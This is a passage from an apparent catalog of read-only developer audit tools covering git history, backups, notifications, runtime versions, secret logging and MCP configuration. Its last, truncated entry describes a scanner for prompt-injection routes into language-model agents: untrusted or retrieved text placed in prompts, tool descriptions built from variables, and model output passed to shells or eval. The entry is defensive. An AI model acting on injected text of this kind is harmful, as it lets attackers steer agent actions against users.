every line ever written there; the seven largest alone carried 25,083 of 28,895 lines. Three DAG steps: one reader that walks git history recording added and deleted lines and file counts per commit, one that buckets them into a fixed size distribution and computes median, ninetieth percentile and the share carried by commits over a threshold, and one join that prints the distribution and the largest commits. The 400-line threshold is a parameter, not a law, and the report says so. Size is added plus deleted lines with renames left visible, so a file move reads as large on purpose rather than hiding; binary files count as files and contribute no lines. Big is not treated as bad: a generated file or a formatting pass is legitimately huge, and the output says it measures what a reviewer had to hold, never whether the change was wrong. A path outside a git work tree, a missing git, and a branch with no commits each print a different honest answer instead of a zero. Read-only toward your repository: it checks out nothing, rebases nothing, edits no file, makes no network call, carries no credentials, and needs only python3 and git. The one thing it writes is its own review-load.json report, inside the run workspace.ROTE3 STEPSREAD ONLY1 ↓543HotspotsRanks the files that absorb the most change and are largest when they do, so you can see where the work actually concentrates. On the repository this was built on, 17 percent of every file change landed on the busiest ten percent of files, and half of all changes ever made touched just 36 of 149 files. Three DAG steps: one reader that walks git history counting how many commits touched each still-tracked file, one that measures each file's current length, and one join that ranks them by commits multiplied by lines and reports how concentrated the churn is. Deleted files are dropped because their churn is history rather than a hotspot, and non-code files are listed separately instead of crowding the ranking. Churn is reported as attention, never as quality: the output says plainly that a file which changes often may simply be where the work is. A path outside a git work tree, a missing git, and a repository with no recorded history each print a different honest answer instead of a zero. Read-only toward your repository: it checks out nothing, rewrites nothing, edits no file, makes no network call, carries no credentials, and needs only python3 and git. The one thing it writes is its own hotspots.json report, inside the run workspace.ROTE3 STEPSREAD ONLY1 ↓544Stripe Webhook Signature GuardSecurity & Governance Sentinel for stripe-webhook-signature-guard: Scans authorization tokens, inspects protocol payloads, checks CORS policies, and mitigates OWASP Top 10 vulnerabilities.SESSIONS6 STEPSREAD ONLY1 ↓545Seo Canonical Tag CrawlerHeadless Browser & E2E Auditor for seo-canonical-tag-crawler: Launches headless Chrome/Chromium to audit Core Web Vitals, simulate user journeys, and render PDF reports.SESSIONS6 STEPSREAD ONLY1 ↓546Redis Cluster Failover TesterHigh-Throughput Infrastructure & Scaling Engine for redis-cluster-failover-tester: Simulates extreme concurrent load, evaluates Redis token buckets, and benchmarks Kafka event streams.SESSIONS6 STEPSREAD ONLY1 ↓547Pupeteer Pdf Invoice GeneratorHeadless Browser & E2E Auditor for pupeteer-pdf-invoice-generator: Launches headless Chrome/Chromium to audit Core Web Vitals, simulate user journeys, and render PDF reports.SESSIONS6 STEPSREAD ONLY1 ↓548Producthunt Analytics ProberDomain Analysis & Developer Utility for producthunt-analytics-prober: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY1 ↓549Postman Api Schema RunnerDomain Analysis & Developer Utility for postman-api-schema-runner: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY1 ↓550Playwright E2e Smoke RunnerHeadless Browser & E2E Auditor for playwright-e2e-smoke-runner: Launches headless Chrome/Chromium to audit Core Web Vitals, simulate user journeys, and render PDF reports.SESSIONS6 STEPSREAD ONLY1 ↓551Lighthouse Cwv Visual AuditorHeadless Browser & E2E Auditor for lighthouse-cwv-visual-auditor: Launches headless Chrome/Chromium to audit Core Web Vitals, simulate user journeys, and render PDF reports.SESSIONS6 STEPSREAD ONLY1 ↓552Kafka Consumer Lag SentinelHigh-Throughput Infrastructure & Scaling Engine for kafka-consumer-lag-sentinel: Simulates extreme concurrent load, evaluates Redis token buckets, and benchmarks Kafka event streams.SESSIONS6 STEPSREAD ONLY1 ↓553Hacker News Trend RadarDomain Analysis & Developer Utility for hacker-news-trend-radar: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY1 ↓554Graphql Query Depth LimiterDomain Analysis & Developer Utility for graphql-query-depth-limiter: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY1 ↓555Golang High Speed Proxy GuardSecurity & Governance Sentinel for golang-high-speed-proxy-guard: Scans authorization tokens, inspects protocol payloads, checks CORS policies, and mitigates OWASP Top 10 vulnerabilities.SESSIONS6 STEPSREAD ONLY1 ↓556Merge LineageClassifies how every commit on your current branch actually landed: through a pull request, or straight in. On the repository this was built on, 18 of 19 commits arrived through a PR and every one of those 18 was landed by the person who wrote it, so nobody else ever pressed merge. Three DAG steps: one reader that walks the branch recording author, committer, parents and subject for each commit, one that classifies each landing as a squash-merged PR, a merge-commit PR, a local merge or a direct commit and marks whether the author also landed it, and one join that ranks direct commits newest-first and lists the pull requests their own author merged. Review is inferred from the commit graph alone and never from a forge API, so DIRECT is an upper bound and VIA A PR is a floor, and the report says so. Self- landed is reported as a fact about who pressed merge, never as a claim that the change went unreviewed. A path outside a git work tree, a missing git, and a branch with no commits each print a different honest answer instead of a zero. Read-only toward your repository: it checks out nothing, rebases nothing, pushes nothing, edits no file, makes no network call, carries no credentials, and needs only python3 and git. The one thing it writes is its own merge-lineage.json report, inside the run workspace.ROTE3 STEPSREAD ONLY1 ↓557Bundlephobia Size Budget CheckDomain Analysis & Developer Utility for bundlephobia-size-budget-check: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY1 ↓558Rule DriftFinds every commit that changed the rules your AI agent follows, and reports whether that change was ever reviewable on its own. On the repository this was built on, 8 of 8 rule changes were bundled into a commit that also changed code, the largest touching 50 files at once, so no reviewer ever saw the rule change by itself. Three DAG steps: one reader that finds tracked agent-governing files (CLAUDE.md, AGENTS.md, .cursorrules, copilot- instructions.md, .mdc rules, and anything under .claude, .cursor/rules, .github/instructions, .agents or .codex), one that walks git history for every commit touching them and re-reads each commit's full file list, and one join that splits those commits into bundled versus changed-alone and ranks them by blast radius. Bundling is reported as a review property, never as wrongdoing. A path outside a git work tree prints INDETERMINATE, and a repository with no rule files says so plainly instead of returning a confident zero. Read-only toward your repository: it checks out nothing, reverts nothing, edits no file, makes no network call, carries no credentials, and needs only python3 and git. The one thing it writes is its own rule-drift.json report, inside the run workspace.ROTE3 STEPSREAD ONLY1 ↓559Context GuardContext overflow risk scanner for LLM applications. Scans source code for large system prompts, hardcoded context limits, truncation patterns, and inefficient history management. Returns a deterministic verdict (CLEAN / CAUTION / WARNING / CRITICAL) with categorized findings and prioritized recommendations. Read-only, no credentials. ROTE3 STEPSREAD ONLY1 ↓560Counterexample HunterSearch for a small counterexample to an algorithm idea, explain the broken assumption, and label confidence. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE1 STEPSREAD ONLY1 ↓561Why Did My Leetcode FailExplain a failing coding solution against a counterexample, isolate the violated assumption, and suggest the smallest conceptual correction. Read-only: no code execution, network calls, writes, credentials, or secret values.ROTE1 STEPSREAD ONLY1 ↓562Cross Split Near Duplicate LeakageAudits dataset contamination across train, validation, and test splits using four distinct evidence layers: exact SHA-256 identity, Unicode/case/URL/number-normalized identity, 64-bit SimHash proximity, and label/group/time conflicts. The join distinguishes proven duplicate leakage from approximate lexical neighbors and emits identifier-and-hash witnesses without exposing record text. JSON, JSONL, labels, grouping keys, timestamps, distance threshold, and record cap are explicit inputs. Custom split names require a complete split_order and chronology remains INDETERMINATE when order or timestamps are missing. It is read-only; SimHash is lexical rather than semantic, and the quadratic near-neighbor pass is deliberately capped so a truncated or oversized audit fails instead of quietly sampling.ROTE5 STEPSREAD ONLY1 ↓563Backup Restore Proof GapSeparates the existence of backups from evidence that a service can actually be recovered. Four independent probes build an asset-by-asset matrix for policy and successful snapshot coverage, point-in-time RPO exposure, offsite/immutability/delete-principal controls, and recent passed restore tests including required evidence and dependency assets; failed, incomplete, or future-dated evidence never establishes recovery. The join treats an untested dependency chain as a proof gap rather than a successful backup. It is read-only and consumes an offline evidence manifest. It never contacts storage, decrypts data, or performs a restore, so a passing row is bounded to the recorded test scope and age rather than a promise about the next incident.ROTE5 STEPSREAD ONLY1 ↓564Http Cache Behavior SimulatorReplays a deterministic, shared HTTP-cache timeline for at least two principals and exposes privacy leaks that header checklists miss. Independent probes validate the scenario, simulate freshness and hit selection, test cache-key partitioning, and interpret Cache-Control, Vary, Authorization and Set-Cookie interactions; the join reports a cross-principal body witness when one exists. It is read-only and network-free: callers supply the miss responses, so the same scenario produces the same result. The model covers common shared-cache behavior but does not claim every RFC extension, CDN override, revalidation race, or vendor-specific cache-key rule.ROTE5 STEPSREAD ONLY1 ↓565Feature Flag State SpaceTurns feature-flag definitions, call-site reads, environment defaults, interaction constraints, and test assignments into an explicit test state space. Four parallel probes detect undefined reads and fallback mismatches, drifted or missing environment defaults, expired definitions, forbidden combinations, uncovered valid states, and uncovered pairwise interactions; the join keeps contract failures separate from coverage debt. It is read-only and works from an offline JSON manifest, making hidden combinatorics visible before a rollout. It does not inspect arbitrary source code or judge test assertions, and enumeration is intentionally capped by max_states rather than pretending a truncated space is complete.ROTE5 STEPSREAD ONLY1 ↓566Experiment Inference SanityRuns a repeatable pre-decision gate over a binary two-arm experiment: sample-ratio mismatch, absolute effect with confidence interval, power against the prespecified MDE, and sequential-look plus family-wise multiple-testing claims. Four independent statistical probes feed a join that blocks a launch claim when assignment integrity or adjusted significance fails, while distinguishing underpowered or direction-uncertain evidence as review work. It is deterministic, offline, and read-only. Calculations use transparent large-sample normal approximations and diagnostic O’Brien-Fleming/Bonferroni/Holm checks; they do not replace a prespecified design, variance-reduction model, clustered analysis, or domain decision cost.ROTE5 STEPSREAD ONLY1 ↓567Forwarded Header Trust MapBuilds a source-to-sink trust map for Forwarded, X-Forwarded-For and related client identity headers. Four independent probes enumerate attacker-controlled sources, trace taint through every declared proxy action, audit sanitizer boundaries, and identify sensitive authorization or routing sinks; a join refuses to call the system safe when any leg did not run. It is useful before enabling framework proxy-trust settings or IP allowlists behind layered CDNs and ingress proxies. The model is static and read-only: it never sends spoofed traffic, validates a CIDR, or proves that production matches the supplied topology.ROTE5 STEPSREAD ONLY1 ↓568Backup RealityYou believe you have backups. Answers one question about THIS machine: for every backup and sync mechanism it DECLARES, is there evidence that the mechanism recently produced an artifact? Reconciles five declaration sources read from configuration and code alone - Time Machine's destination list and exclusions plus any backup store on a mounted volume, launchd agents and crontab lines whose command is rsync, restic, borg, duplicity, rclone, tar -c, pg_dump, mysqldump, mongodump or sqlite3 .backup, backup-named scripts nothing schedules, the cloud sync roots (iCloud Drive, Dropbox, Google Drive, OneDrive, Box), and the data stores declared by docker compose files and local database data directories - against the evidence each one leaves behind: the mtime and size of the destination where that destination is on this disk, the arrival times recovered from the timestamps INSIDE the job's own log (clustered so fifty lines from one run count as one run, then compared as a median gap against the declared interval), the failure strings in those logs, and launchctl's own record of whether the job was ever loaded. Ranks by what the user loses rather than by subsystem: a declared mechanism with no evidence it ever produced an artifact is CRITICAL, because belief and reality point in opposite directions; work that exists on exactly one disk is HIGH; a job writing "no space left on device" into its log while exiting 0 is HIGH; a valuable directory under no mechanism at all is MEDIUM; and a mechanism whose success leaves no observable artifact gets its own class rather than being graded healthy, because an unverifiable backup is an unknown one. Sync coverage is decided by INODE IDENTITY, not by path prefix, because on macOS the iCloud Desktop and ~/Desktop are the same directory rather than one being inside the other. A fourth stage re-opens the exact destination stat and the exact log line behind every CRITICAL and HIGH candidate and returns CONFIRMED, WITHDRAWN or UNCERTAIN quoting what it read. Excluded WITH REASONS and counted, never silently dropped: caches, node_modules, .venv, build output, anything in Time Machine's own exclusion list, /dev/null output, a repository whose commits are all pushed, and a destination on a volume that is not mounted, which is UNKNOWN rather than broken. Git is a SUPPORTING signal here and not the subject - the `unpushed-work` play owns the per-repository git verdict; this one asks only whether a repo's work is reachable by ANY mechanism, which is why a repo with unpushed commits inside a sync root is excluded here and reported there. READ-ONLY, and narrower than that usually means: it never writes, moves, deletes or triggers a backup, never runs tmutil, and does not spawn a backup binary at all - not even to ask it a question. No credentials leave it: every destination is reduced at construction time to a shape plus an unstable digest, and no URL, host, bucket or token is ever carried. No network. Needs python3 and, for the launchd and Time Machine sources, launchctl and plutil.ROTE3 STEPSREAD ONLY1 ↓569Notification BlackholeA job that ran is not a person who was told. Answers one question about THIS machine: for every notification SINK its recurring automations declare, is there any evidence that a message ever actually arrived? The hook is a real failure this play was built from - an hourly launchd agent whose exit code was 0 on all 82 runs launchd had counted, whose stderr held nothing but `dial tcp: lookup discord.com: no such host`, and whose Discord digest therefore reached nobody while every counter on the machine said healthy. Sinks are found by READING configuration and code: Discord, Slack, Teams, Telegram, ntfy, Pushover and PagerDuty webhooks and bot tokens referenced by NAME in launchd plists, the user crontab, the shell scripts those jobs actually run, GitHub Actions workflows, n8n workflow exports and .env-style files; mail senders (mail(1), sendmail, msmtp, SMTP host settings, send-mail actions); desktop notifiers (osascript display notification, terminal-notifier, UserNotifications, notify-send); and cron's two forgotten sinks, an explicit MAILTO and the implicit mail-on-output that MAILTO="" switches off. Evidence of DELIVERY comes from the jobs' own logs, where a line only counts as a delivery failure when a sink family and a failure class - DNS, connection refused, TLS, a contextualised 4xx or 5xx, a rate limit, an explicit send failure - sit within 40 characters of each other in a line short enough to be an error rather than prose; a bare number is never read as a status code, because `\b5[0-9][0-9]\b` matches "508.4KB" and produced 1335 false failures on the development machine before that rule existed. Ranked by what it costs: a sink with delivery failures in its log while its job exits 0 is CRITICAL, because every dashboard reads fine; a sink reached through a NAME that resolves to nothing on this machine - not on PATH, not a shell function, not a file - is HIGH, because the notification cannot possibly go out; delivery UNOBSERVABLE is its own MEDIUM class and is graded neither healthy nor broken, since a job that notifies only on failure leaves exactly the same empty log as a job whose sink died a month ago; and a notification credential defined in a file that nothing references is LOW, a live bearer credential worth rotating. A fourth stage re-opens the exact log line and the exact configuration line behind every CRITICAL and HIGH candidate and returns CONFIRMED, WITHDRAWN or UNCERTAIN quoting what it read: it withdraws an undated failure whose log has not been appended to across several counted runs, because that is a record of a past outage rather than a sink failing now, and it withdraws an unresolvable name that a wider search does find. SENDS NOTHING AND CONNECTS TO NOTHING: no curl, no socket, no DNS lookup, not even to validate a webhook host, because posting a test message to prove a sink works is the exact act this play exists to make unnecessary. No binary is ever spawned to interrogate itself, not with --version and not with --help. Webhook URLs and tokens are treated AS credentials: every sink is reduced to a family, a shape and an identifier NAME before it enters any document, and no URL, no token and no fragment of one - not the last four characters, not a numeric webhook id - is ever emitted. Needs python3; launchctl, plutil and crontab each add one source and their absence is reported as an absence rather than a clean result.ROTE3 STEPSREAD ONLY1 ↓570Pr Revert HorizonFinds the first later base-branch commit or merged pull request that overlaps a target merged GitHub PR by exact path, rename chain, or high-risk semantic key. Reports the observed low-entanglement window, direct evidence links, scan boundaries, and uncertainty. Read-only; never changes or reverts code and never claims a revert is safe.ROTE2 STEPSREAD ONLY1 ↓571Tool Surface ReconcileAnswers one question about the agent running on this machine: do the three answers to "what tools does this agent actually have" agree. There are three, and every published inventory play reads only one of them. ADVERTISED is what a session offered the model, which Claude Code records structurally in its transcripts as the literal mcp__<server>__<tool> names the model was handed. CONFIGURED is what a config file declares, read from every readable site: Claude Code user, project and plugin scope, Claude Desktop and its INSTALLED EXTENSIONS (whose manifests are declarations, and skipping them is what makes an installed extension look like it came from nowhere), Cursor, Windsurf, VS Code, and a Codex config.toml, each attributed to its harness by PATH rather than by filename, because at least six tools use the name mcp.json and calling all of them Claude Code turns another harness's config into a fabricated finding. AUTHORIZED is what could actually have been called, from three on-disk witnesses: the harness's own needs-auth cache, its record of which connectors ever completed OAuth, and the sessions' own needsAuth and failed-connection records. The gap between the three IS the finding, and it is not visible from any one of them. Advertised-but-unauthorized is high: the model reaches for a tool mid-task and burns a turn on an auth error it had no way to predict. Was-authorized-and-now-is-not is high for the same reason and worse, because a working call path stopped working and nothing recorded when. Advertised under a bare UUID with no declaration anywhere is high, because there is no name on disk to tell the user which vendor holds the grant and nothing on disk to revoke. Advertised with no readable declaration is medium ONLY when disk also records the server connecting, which proves something really is being reached from a declaration outside the readable surface. When nothing records it being installed AND nothing records it ever connecting - not pending, not failed, no auth state, never connected - that is what a server the host process injects in-process looks like from disk, and it is reported as context with its count stated, because a host-injected server cannot have a user-readable declaration. That test is a structural conjunction rather than a list of known built-in names, which would go stale the first time the harness adds a tool; both halves are required, because the connection test alone would sweep in a plain local stdio server and the declaration test alone is what wrongly graded four installed desktop extensions as findings. Configured but never advertised is medium dead weight. Fully aligned is context, not a finding. A fourth stage re-reads the exact authorization key and the exact declaration line behind every high candidate and returns CONFIRMED, WITHDRAWN or UNCERTAIN quoting what it read, so an OAuth flow that completed between the two reads is withdrawn with that as the reason rather than printed as live. Excluded and counted rather than dropped: a declaration with enabled=false, a server configured only for a harness whose advertised set is unreadable, a pending rather than failed connection, and a claude.ai connector with no local footprint, which is how connectors are designed. SPAWNS NOTHING. It starts no server, executes no third-party binary, and never runs a --help: a CLI that dispatches on its first positional argument takes --help positionally, so <tool> <subcommand> --help can run the real subcommand handler. It reads files and nothing else, opens no socket, and therefore cannot prove any server works. Credentials are reduced by construction, never scrubbed after the fact: an MCP declaration is one of the most credential-dense objects on a developer's disk, so every env map, header map and argv is reduced to key NAMES before it enters any record, and the only values ever read are the booleans and transport words on a four-key allowlist.ROTE3 STEPSREAD ONLY1 ↓572State Machine Liveness ProofChecks a bounded finite JSON state machine for more than syntactic validity: it proves reachability, computes strongly connected components, identifies reachable states with no path to a terminal, and emits a prefix-plus-cycle counterexample for closed livelocks or possible starvation. Four independent graph probes feed a join that distinguishes a proof failure from an incomplete run. It is useful for queue workers, workflow engines, payment states and reconciliation loops before implementation. The contract caps models at 500 states and 5,000 transitions, rejects string-coerced fairness and duplicate edges, and makes terminal semantics explicit: halting by default or reachability goal. Guards remain labels unless callers expand them into states, so the play does not pretend to model arbitrary program semantics.ROTE5 STEPSREAD ONLY1 ↓573AgentreadyRuns a bounded static production-readiness audit of a local AI/LLM/RAG/agent project across architecture, providers, retrieval, dependencies, secret risk, reliability, tool safety, deployment, observability, and documentation. Read-only, offline, never executes target code, and never reveals matched secret values.ROTE1 STEPSREAD ONLY1 ↓574Claim Evidence AuditAnswers one question about a CV, a portfolio page, a project README or a conference bio: for each quantified claim it makes about software, is there evidence for it in the repository it credits. This is not a README-instruction check like readme-rot, which asks whether a documented COMMAND still resolves; this asks whether a quantified CLAIM is supported by the code it credits. Every number a document commits to - "cut p99 latency 40%", "handles 12k requests per second", "reduced build time from 9 minutes to 2", "97% test coverage" - was written once and then left to drift from the code, and nothing anywhere checks it. Each claim comes back SUPPORTED (a matching figure in a committed benchmark, a coverage report, a CI workflow, the project's own docs, or a source constant), CONTRADICTED (the repository states a different figure for the same measure, so the document is now wrong rather than merely unevidenced), STALE-EVIDENCE (the figure matches, but the file it came from was measured against a version of the code that no longer exists, and the age gap is reported), UNSUPPORTED (no figure of that kind exists in the repository at all - which is not the same as false, because the real measurement may live in a notebook, a dashboard or a paper), or UNCHECKABLE ("led a team of 4", "presented to 200 people": a repository cannot evidence these, so they are counted and excluded rather than reported as problems). The hard part is not finding numbers, it is not inventing findings, so a contradiction has to clear four bars at once - the evidence must be a committed measurement or the project's own prose and never a constant in a source file, the two sides must share at least three terms including one that names a KIND of measurement, and the two figures must be within a factor of twenty, because "18,942 requests admitted" against "20 workers" is two different measures rather than a disagreement. Rounding is read the way a reader reads it: a document saying p99 46 ms is supported by a committed 45.7 ms. Markdown table rows are matched through their column headers, because a table row carries digits and the words that say what they mean are in the header. A third stage re-opens the exact document line and the exact evidence line behind every critical and high finding and reports CONFIRMED, WITHDRAWN or UNCERTAIN with the text it read there, which is what catches an evidence figure that sits inside a fenced code block and is therefore configuration rather than a measurement. Claim-to-repository attribution is reported last, always qualified and never as an accusation, because review, design and pair work leave no commit and a squash records someone else as author. Read-only and offline: it never edits the document, never runs a benchmark, and never contacts a network, so a claim about a live site cannot be checked here at all. The document is a personal one, so no phone number, e-mail address or street address in it is ever printed - claims and evidence only.ROTE3 STEPSREAD ONLY1 ↓575Listening SurfaceAnswers one question about the machine it runs on: what is listening right now, who owns it, and how far can it be reached. A dev machine accumulates listeners - a forgotten npm run dev, a database a compose file published on every interface months ago, a tunnel, an agent harness on a debug port - and no source scan can answer it, because the answer is live kernel state rather than a file. Bound sockets come from lsof with their owning process, and from netstat as well, because an unprivileged lsof cannot see other users' processes and the difference between the two lists is the set of listeners that could not be attributed, which are named rather than dropped. The grade follows the bind address, which is the whole security question: 127.0.0.1 and ::1 are reachable from this host alone, 0.0.0.0 and :: are every interface including the local network, and a specific LAN address is in between. Each process is then traced to a supervisor - a launchd label, a Homebrew service, a Docker container or compose project, or nothing at all - and cross-referenced against docker-compose port mappings and LaunchAgent plists on disk, so "declared here, bound now" and "bound with nothing on disk explaining why" become separate claims. Ranked by reach: a datastore port (5432, 6379, 27017, 3306, 9200, 11211) or a debug or inspector port (9229, 9230, 5678, 9224, 4444) on a wildcard address is critical, since a datastore port is the data and an inspector port is remote code execution by design; any non-loopback listener with no supervisor is high, because nobody will remember to stop it; a supervised non-loopback listener is medium and often intended; a loopback-only listener is context, not a finding. A fourth stage re-reads the exact socket and the exact declaration line for every critical and high candidate and returns CONFIRMED, WITHDRAWN or UNCERTAIN quoting what it read, so a socket that closed between the two reads is withdrawn with that as the reason instead of being reported stale. Excluded and counted rather than silently dropped: system daemons the user did not install, loopback-only listeners, a port bound to a specific LAN address with a matching declaration, and a container port published only to the docker bridge. Read-only and never outward: it reads the local socket table, the local process and launchd tables, the local Docker daemon's container list, and local config files. It never opens a network socket, never connects to a listener it found, never sends a packet, never sweeps a port range and never names another host, because connecting to something it discovered would make it a scanner. No argv text is ever captured: a command line holds tokens, so every process is reduced by construction to its executable path plus a redacted argument count. It is a snapshot, and it reports bind address rather than reachability - it cannot see a firewall, a router, NAT or VPN topology.ROTE3 STEPSREAD ONLY1 ↓576Runtime DriftFour systems each hold an opinion about which runtime version this machine uses, and they disagree silently until something breaks in CI and not locally. This answers one question per runtime: what does the project DECLARE, what does the version MANAGER select, what is actually first on PATH, and what does CI use. The reconciliation table across those four columns is the deliverable, not a list of rule violations. Declarations are read from .nvmrc, .node-version, package.json engines and volta, .python-version, pyproject.toml requires-python, the go.mod go and toolchain directives, rust-toolchain.toml, .ruby-version, .tool-versions and Dockerfile FROM tags. Manager selection is read from the managers OWN STATE FILES - nvm, fnm, nodenv, volta, pyenv, rbenv, asdf and mise - and never by executing a manager, which is also the only way to read nvm at all, since nvm is a shell function with no binary to run. Reality is what command resolution and a version probe actually report, including every other copy of the same runtime further down PATH, because a shim resolving to a version the manager did not select is a real and confusing state. CI is read from setup-node, setup-python, setup-go, setup-ruby and rust-toolchain steps plus container image tags, and a step that delegates to a *-version-file is resolved rather than reported as unknown. Findings are ranked by what breaks: CRITICAL when a project declares a version that is not installed at all, so the declaration is aspirational and whatever is on PATH is silently used instead, and when CI and this machine differ across a feature version; HIGH when two declaration files in one project disagree, and when the version manager selects X while PATH resolves to Y; MEDIUM when a runtime on PATH is past end of life, and when two managers both claim one runtime so which wins depends on shell startup order. A declared range that the installed version satisfies is NOT a finding, and neither is a manager that is installed but unused - both are reported as cleared. Every CRITICAL and HIGH is then re-opened by a separate verify stage that re-reads the exact declaration line from disk and re-runs the exact version probe, emitting CONFIRMED, WITHDRAWN or UNCERTAIN and quoting what it read. THIS PLAY RUNS OTHER PROGRAMS, which is unusual and is disclosed here rather than buried: it executes a version probe from a fixed hard-coded allowlist - node/python3/python/rustc/cargo/ruby/deno/bun --version, java -version, and `go version`, which is the one subcommand on the list because Go has no version flag - with a five second hard timeout each, no shell, a minimal environment, never an argument taken from a config file, and never a binary a repository shipped. A probe that cannot be run safely is marked UNCERTAIN rather than guessed at. End-of-life data is a dated snapshot, not a live feed. Read-only: nothing is installed, activated, switched or written, no network call is made, and no credential is read.ROTE3 STEPSREAD ONLY1 ↓577Developer Continuity ReportReconstruct repository handoff state from Git evidence and name the next action.ROTE6 STEPSREAD ONLY1 ↓578Dep DriftFinds the dependencies your code imports but never declares, which is how a project that works on your machine fails on a clean install. On a real polyglot repository this found 129 packages imported from source with no entry in any manifest, alongside 21 declared and never imported. Three DAG steps: one reader that parses every package.json, requirements.txt and pyproject.toml, one that parses actual import and require statements across .py, .js, .jsx, .ts, .tsx, .mjs and .cjs, and one join that classifies each dependency as both, never imported, never declared, or build tooling. Standard library, relative imports, sibling modules in the same tree, tsconfig path aliases and framework virtual modules are all excluded, and build tools are separated out rather than counted against you, so the number is conservative by construction. Finding no manifest prints INDETERMINATE instead of a confident zero. Read-only toward your project: it installs nothing, removes nothing, edits no file you already have, makes no network call, carries no credentials, and needs only python3. The one thing it writes is its own dep-drift.json report, inside the run workspace.ROTE3 STEPSREAD ONLY1 ↓579Mcp Harness DoctorAudits Claude Desktop, Cursor, and Windsurf MCP configs for broken binaries, missing environment variables, malformed JSON, and configuration health.ROTE3 STEPSREAD ONLY1 ↓580RoottraceRootTrace: read-only developer troubleshooting. Investigates a GitHub issue and its comments, then produces an evidence-backed report with a likely root cause and recommended next action.APISESSIONSGITHUB-API2 STEPSREAD ONLY1 ↓581Devops Job RadarDevOps Job Radar & Matcher: Sweeps legitimate public APIs (HN Who's Hiring, Reddit r/devops) for DevOps roles, evaluates match scores (0-100) against candidate CV skills (Kubernetes, Terraform, CI/CD, AWS, SRE), maintains living CSV with manual status note preservation & STALE marking, and explicitly flags LinkedIn/Naukri/Indeed for manual checking.ROTE1 STEPSREAD ONLY1 ↓582Assignment Submission PackProduce a reusable assignment submission pack: analyze the requirements, build a solution outline and a submission checklist, and write a submission folder containing README.md, solution.md, and checklist.md.ROTE5 STEPSREAD ONLY1 ↓583Arch Threat VisualizerAutonomous architecture mapper and threat visualizer that generates an interactive dark-mode HTML and SVG dashboard artifact.ROTE1 STEPSREAD ONLY1 ↓584Secret LoggingFinds the places a codebase writes a credential into a log. Reports a secret-named value handed to a log call, a whole environment, header, config or request object logged wholesale, a caught error logged with its full request context, and JSON serialisation of an object with secret-shaped keys, across JavaScript, TypeScript, Python, Go and Java-ish sources. Comments and string bodies are masked by a language-aware lexer, so a comment or doc string that merely names a logging call is never a finding, and every argument is screened for redaction first: a boolean, a length, a hash or a deliberate last-four slice is how careful code logs a credential presence, not a leak. tokenizer, tokens, keyboard, secretName, passwordField and API_KEY_HEADER_NAME are not secret values, and process.env.NODE_ENV is not process.env. Read-only, no network, no credentials.ROTE3 STEPSREAD ONLY1 ↓585Retry SafetyAnswers one question about a codebase: where does it retry in a way that will make a bad day worse. Ranks by blast radius. A retried NON-IDEMPOTENT operation comes first and is a correctness bug, because a POST, a charge, a create, an append or an email send that timed out may already have succeeded, and the replay bills the customer twice. Then the availability bugs: retries with no maximum attempt count or a cap so high it may as well be none, backoff with no jitter which synchronises every client into one thundering herd, a flat delay with no growth at all, a retry wrapped around another retry so the attempt counts multiply, and no timeout on the underlying call so one attempt can hang forever. Last, the waste: retrying a 4xx, a validation failure or an auth rejection, which can only fail again. Covers hand-written loops in Python, JavaScript, TypeScript, Go, Java, Kotlin and C sharp, and the visible configuration of tenacity, backoff, urllib3 Retry, axios-retry, p-retry, got, avast retry-go, cenkalti backoff, resilience4j, Spring Retry and Polly. Precision is the design. Comments and doc strings are blanked by a language-aware lexer, so prose that spells out a bad retry loop is never a finding. A deliberate poll loop is recognised, excluded and counted rather than reported as a missing backoff. PUT, DELETE and GET are idempotent by specification and are never called unsafe writes, nor is a POST carrying an idempotency key, a dedup id, an upsert or an ON CONFLICT clause. A delay that varies with the attempt number is backoff, so a linear one is excluded from the flat-delay rule. Library defaults are not guessed: only configuration visible in the source is judged, and where safety depends on a library version that cannot be read from source, the finding says so. Read-only, offline, no credentials.ROTE2 STEPSREAD ONLY1 ↓586Readme RotAnswers one question about a README: which of its instructions no longer work. A README is the only interface a stranger has to a project and the one file nothing verifies, so it goes stale silently and the person who finds out is the newcomer who gives up in the first five minutes. This checks the README against the repository as it exists right now, and ranks by what breaks that newcomer first: shell commands in fenced code blocks that invoke something gone (`npm run X` absent from package.json scripts, `make X` absent from the Makefile, `./scripts/x.sh` not on disk, `python x.py` missing), relative links and images pointing at files that are not there, including the case-only mismatch that opens on a Mac and 404s on GitHub; badge URLs naming a repository path that no longer matches the git remote, and workflow badges naming a workflow file that is not in .github/workflows; and environment variables the README tells you to set that are absent from the .env.example it tells you to copy. The hard part is not finding these, it is not inventing them, so it knows what is not an instruction: a fence whose language is json or python or yaml is never read for commands; in a console transcript only the prompt-prefixed lines are commands and the rest is output; a heredoc body is data; everything after a `cd` into a directory that is not here is unknowable, except the clone idiom `cd <this repo's own name>`; a path holding a placeholder or a glob is a template; a path under build/ or target/ or dist/ is an artifact of the checkout, not of the README; a Makefile with an unresolvable include or a `$(VAR)` target name or a catch-all rule has its `make X` check suppressed and the suppression reported; a link inside a code fence or an inline code span is someone showing markdown syntax; and a command whose binary is an ordinary system tool used generically (curl, git, docker, cp, pip) is never modelled at all. Line numbers point at the offending command, not at the opening fence. Read-only: nothing is executed, installed or written.ROTE2 STEPSREAD ONLY1 ↓587Prompt Injection SurfaceAnswers one question about a codebase: where does it put untrusted text into a model prompt in a way that lets that text act as instructions. Almost every agent codebase concatenates SOMETHING into a prompt, so a scan that reports every interpolation reports the whole repository and is worth nothing. The entire value here is the difference between two sentences - "user text reaches the prompt" and "user text reaches the prompt AND the model can act" - and severity is decided by reach rather than by pattern count. Seven shapes are separated because they are seven different conversations. User-controlled data concatenated or interpolated into a prompt with no delimiter, no fence and no instruction to treat it as data: f-strings, template literals, + concatenation, .format(), %-formatting and fmt.Sprintf. Retrieved content - a fetched web page, a file read off disk, a database row, an email body, a PR description, an issue comment - placed in a prompt, which is the higher-risk half because the attacker is not the user and nobody reviews it. A tool or function-calling definition whose description or enum values are built from a variable rather than written as a literal, which lets whoever controls that value rewrite what the tool CLAIMS to do. A model response used in a privileged action with no validation - passed to a shell, a SQL statement, a file write, an HTTP call or an eval - which is the output half of the same problem and is usually the worse 